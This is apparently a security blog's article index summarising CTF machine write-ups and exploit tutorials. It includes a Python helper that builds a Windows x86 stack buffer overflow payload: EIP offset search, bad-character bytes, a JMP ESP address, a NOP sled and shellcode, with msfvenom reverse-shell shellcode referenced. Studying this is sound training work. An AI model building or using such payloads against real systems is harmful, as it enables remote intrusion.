Latest articles

Stack-Buffer Overflow [Windows x86] (Part II)

In this article, we explore an exploit that follows a specific flow to obtain a remote shell. The process includes byte generation, a jump to the ESP memory address, and shellcode execution. Through detailed steps and the use of tools such as mona.py and msfvenom, we demonstrate how to exploit a vulnerability and achieve the desired goal.
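As an added example that is not code from the original article, the helper below reproduces in plain Python the three preparatory steps the summary mentions: generating a cyclic pattern to locate the EIP offset (what mona's pattern_create/pattern_offset and msf-pattern_create do), generating the byte string used to hunt for bad characters, and assembling the final buffer in which the four bytes that land in EIP hold the address of a JMP ESP and ESP then points at the NOP sled and shellcode. The JMP ESP address and the shellcode bytes are placeholders for this illustration, not values from the article.

```python
import string
import struct

# Cyclic pattern in the Metasploit/mona style: Aa0Aa1...Aa9Ab0Ab1... (unique 4-byte windows up to 20280 bytes)
def pattern_create(length: int) -> bytes:
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested length exceeds the 20280-byte pattern space")

# Given the value the crash left in EIP, return the offset of those 4 bytes inside the pattern.
# x86 is little-endian, so EIP=0x61413161 means the bytes "a1Aa" were overwritten onto the saved return address.
def pattern_offset(eip: int, length: int = 20280) -> int:
    needle = struct.pack("<I", eip)
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError(f"{eip:#010x} not found in pattern")
    return idx

# Every byte 0x01..0xff except the ones already known to be mangled; send it after the EIP
# overwrite and compare memory with this string to find the next bad character.
def badchar_string(exclude=()) -> bytes:
    excluded = set(exclude)
    return bytes(b for b in range(1, 256) if b not in excluded)

# Final layout: padding up to EIP | address of a JMP ESP gadget | NOP sled | shellcode
# After the ret, ESP points just past the overwritten return address, i.e. at the NOP sled.
def build_payload(offset: int, jmp_esp: int, shellcode: bytes, nops: int = 16) -> bytes:
    return b"A" * offset + struct.pack("<I", jmp_esp) + b"\x90" * nops + shellcode


if __name__ == "__main__":
    # Constructed demonstration values: a hypothetical EIP from a crash and a hypothetical JMP ESP address.
    off = pattern_offset(0x61413161)
    print("EIP offset:", off)
    print("badchars without \\x00\\x0a\\x0d:", len(badchar_string([0x00, 0x0A, 0x0D])), "bytes")
    print(build_payload(off, 0x625011AF, b"\xcc" * 4)[:12].hex())
```

The shellcode itself would come from msfvenom (for example a windows/shell_reverse_tcp payload with the discovered bad characters passed via -b), and the JMP ESP address from mona's !mona jmp -r esp, both outside the scope of this snippet.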

Five86-1 - VulnHub

This is an easy machine. The intrusion started by taking advantage of an outdated version of OpenNetAdmin, sending a crafted request to the server and gaining remote command execution as the user www-data; then I had to pivot to the user douglas by cracking a hash using a 10-character password pattern.

Stacked - HackTheBox

This is a crazy difficult machine. For the intrusion I leveraged XSS to pivot to SSRF and thus gain access by abusing the creation of AWS Lambda functions. For the privilege escalation I found a task that was executed at regular time intervals; it concatenated the --handler parameter when creating the Lambda function, so I managed to inject commands and become root in the container.

Altered - HackTheBox

This is a hard difficulty machine. I chained Type Juggling with a SQL injection to upload files using INTO OUTFILE and gain access as 'www-data'; for the escalation I took advantage of the outdated version of the kernel to exploit DirtyPipe.

Hancliffe - HackTheBox

This is a difficult machine. For the intrusion I took advantage of a 'Server Side Template Injection' to gain RCE. The privilege escalation consists of a binary vulnerable to 'Buffer Overflow' but with a peculiarity, little space in the stack memory, so it is necessary to pivot to a 'Socket Reuse' technique.

Stack-Buffer Overflow [Linux 32 Bit] (Part I)

In this article I show how to create and use a buffer overflow exploit to gain access to a shell by abusing unsafe functions like strcpy, getenv, etc. I also show how the binary works at a low level, the ESP and EIP registers, and how to use tools like gdb or hexedit to edit binaries in hexadecimal.

CVE-2019-18818 (Metasploit) + POC

Strapi CMS version 3.0.0-beta.17.4 mishandles password resets, allowing an attacker to take control of a privileged account, so I developed an exploit module for Metasploit and show how to exploit this vulnerability in a practical way.

Base64 - Algoritmo

This article is merely informative, to understand how the base64 encoding algorithm works. I begin with a brief introduction on what cryptography is to put the subject in context. I also give examples of its use in the field of cybersecurity.
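As an added example (not code from the article), the following implements the base64 algorithm from scratch so the mechanics are visible: every 3 input bytes form a 24-bit group that is split into four 6-bit indexes into the 64-character alphabet, and a final group of 1 or 2 bytes is zero-padded and marked with one or two '=' characters. The decoder applies the inverse and rejects malformed input. The sample inputs, including the "admin:s3cret" string resembling an HTTP Basic credential, are constructed for this demonstration.

```python
import string

# Standard (RFC 4648) alphabet: A-Z, a-z, 0-9, '+', '/'
ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"


def b64encode(data: bytes) -> str:
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        pad = 3 - len(chunk)                       # 0, 1 or 2 missing bytes in the last group
        group = int.from_bytes(chunk + b"\x00" * pad, "big")   # 24-bit group, zero-padded on the right
        # Four 6-bit slices, most significant first
        chars = [ALPHABET[(group >> shift) & 0x3F] for shift in (18, 12, 6, 0)]
        if pad:
            chars[4 - pad:] = "=" * pad            # replace the slices that were only padding
        out.append("".join(chars))
    return "".join(out)


def b64decode(text: str) -> bytes:
    if len(text) % 4:
        raise ValueError("base64 input length must be a multiple of 4")
    out = bytearray()
    for i in range(0, len(text), 4):
        block = text[i:i + 4]
        body = block.rstrip("=")
        pad = len(block) - len(body)
        # '=' may only appear at the very end, and at most twice
        if pad > 2 or (pad and i + 4 != len(text)):
            raise ValueError("invalid padding")
        group = 0
        for c in body + "A" * pad:                 # 'A' == 000000 restores the zero padding
            if c not in ALPHABET:
                raise ValueError(f"invalid base64 character {c!r}")
            group = (group << 6) | ALPHABET.index(c)
        out += group.to_bytes(3, "big")[:3 - pad]
    return bytes(out)


if __name__ == "__main__":
    # Constructed sample: what an "Authorization: Basic ..." header carries is just encoded, not encrypted
    creds = b"admin:s3cret"
    enc = b64encode(creds)
    print(enc, b64decode(enc))
```

Because base64 is an encoding and not a cipher, anything recovered from a capture or log that looks like the output above (a multiple of 4 characters from this alphabet, possibly ending in '=') should be decoded and treated as plaintext during an assessment.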

Explore - HackTheBox

This is an easy difficulty machine, the first Android machine. For the intrusion I found with Nmap that ES File Explorer was running; looking at this, I searched for exploits and found that it was vulnerable to reading arbitrary files on the device. Enumerating it a bit, I found an image with a credential that allowed me to access the machine via SSH. For the escalation the machine had the adb port open, so I simply connected to it.

Monitors - HackTheBox

This is a hard difficulty machine. For the intrusion I took advantage of a vulnerable version of 'cacti', exploiting a 'SQLi' in an automated manner and gaining access to the machine through a 'mkfifo' reverse shell; for the escalation I found a Docker 'capability' called 'SYS_MODULE' that could be abused for privilege escalation.